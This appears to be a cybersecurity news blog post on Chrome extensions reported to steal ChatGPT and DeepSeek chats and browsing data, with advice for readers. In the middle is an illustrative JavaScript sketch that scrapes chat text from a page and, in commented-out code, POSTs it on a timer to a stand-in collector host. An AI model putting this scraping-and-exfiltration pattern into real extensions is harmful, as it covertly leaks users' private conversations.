Your private conversations with AI chatbots are under siege, and it’s not just hackers you need to worry about. Two popular Chrome extensions, trusted by a combined 900,000-plus users, have been caught red-handed stealing ChatGPT and DeepSeek chats alongside browsing data. But here's where it gets even more alarming: these extensions, masquerading as handy AI tools, were quietly funneling that sensitive information to attacker-controlled servers every 30 minutes. And this is the part most people miss: they did it all under the guise of collecting 'anonymous analytics.'
The culprits? 'Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI' (600,000 users) and 'AI Sidebar with Deepseek, ChatGPT, Claude, and more' (300,000 users). These extensions weren’t just snooping—they were systematically harvesting every word you typed into your AI chats and every URL you visited. This isn’t an isolated incident, either. Just weeks ago, Urban VPN Proxy, another extension with millions of users, was busted for similar spying activities. Cybersecurity experts have dubbed this growing trend 'Prompt Poaching,' and it’s becoming a favorite tactic for bad actors.
Here’s how it works: once installed, these rogue extensions ask for permission to collect 'anonymized' browser data to 'enhance your experience.' If you agree, the embedded malware starts scraping your chatbot conversations by reading the specific page elements that hold the chat transcript, storing the text locally, and then shipping it off to remote servers such as 'chatsaigpt[.]com' and 'deepaichats[.]com.' To add insult to injury, the attackers even used Lovable, an AI-powered app-building platform, to host their privacy policies and other infrastructure, making their tracks harder to follow.
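To make the mechanism concrete, here is a minimal, defanged sketch of the 'Prompt Poaching' pattern described above: read the chat text out of the page, batch it with the URL, and ship it on a timer. This is illustrative only, not the actual malware; the selector, endpoint, and function names are hypothetical stand-ins.

```javascript
// Illustrative sketch of the "Prompt Poaching" pattern (NOT the real
// malware). Selector and endpoint below are hypothetical stand-ins.

// Pull visible text out of anything that looks like a chat message node.
function harvestMessages(nodes) {
  return nodes
    .map((n) => (n.textContent || "").trim())
    .filter((text) => text.length > 0);
}

// Bundle the harvest into the kind of payload the report describes:
// chat contents plus the page URL, tagged with a capture timestamp.
function buildPayload(nodes, pageUrl) {
  return {
    url: pageUrl,
    capturedAt: Date.now(),
    messages: harvestMessages(nodes),
  };
}

// Inside a real content script this would run on an interval (the
// reported cadence was every 30 minutes) and POST to a collector:
//
//   setInterval(() => {
//     const nodes = [...document.querySelectorAll(".chat-message")]; // hypothetical selector
//     fetch("https://collector.example/ingest", {                    // hypothetical endpoint
//       method: "POST",
//       body: JSON.stringify(buildPayload(nodes, location.href)),
//     });
//   }, 30 * 60 * 1000);

// Demo with plain objects standing in for DOM nodes:
const fakeNodes = [
  { textContent: "  How do I rotate our API keys?  " },
  { textContent: "" },
  { textContent: "Here is the internal runbook..." },
];
const payload = buildPayload(fakeNodes, "https://chat.example/session/1");
console.log(payload.messages.length); // 2
```

Note how little access this requires: reading the rendered page is enough, so no interception of network traffic or API keys is needed, which is exactly why a broad "read your data on websites" permission is so dangerous.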
But here’s the real kicker: even legitimate extensions are getting in on the action. Secure Annex recently revealed that popular tools like Similarweb (1 million users) and Sensor Tower's StayFocusd (600,000 users) have been caught monitoring AI conversations too. Similarweb, for instance, updated its terms in January 2026 to explicitly state it collects AI inputs and outputs, including prompts, queries, and even attached files. While the company claims to anonymize this data, it admits some sensitive information might slip through the cracks. This raises a controversial question: Is this a blatant violation of user trust, or a necessary trade-off for 'free' services?
The stakes are higher than you think. This stolen data isn’t just sitting idle—it can be weaponized for corporate espionage, identity theft, or targeted phishing attacks. Imagine your company’s confidential discussions or personal secrets ending up on underground forums. As OX Security researcher Moshe Siman Tov Bustan warns, 'Organizations whose employees installed these extensions may have unknowingly exposed intellectual property, customer data, and confidential business information.'
So, what can you do? First, uninstall these extensions immediately. Second, think twice before installing any browser add-on, even if it’s 'Featured' or from a seemingly reputable source. And finally, let’s spark a debate: Are we sacrificing too much privacy for convenience? Should browser stores like Chrome Web Store be held more accountable for vetting these extensions? Share your thoughts in the comments—this conversation is just beginning.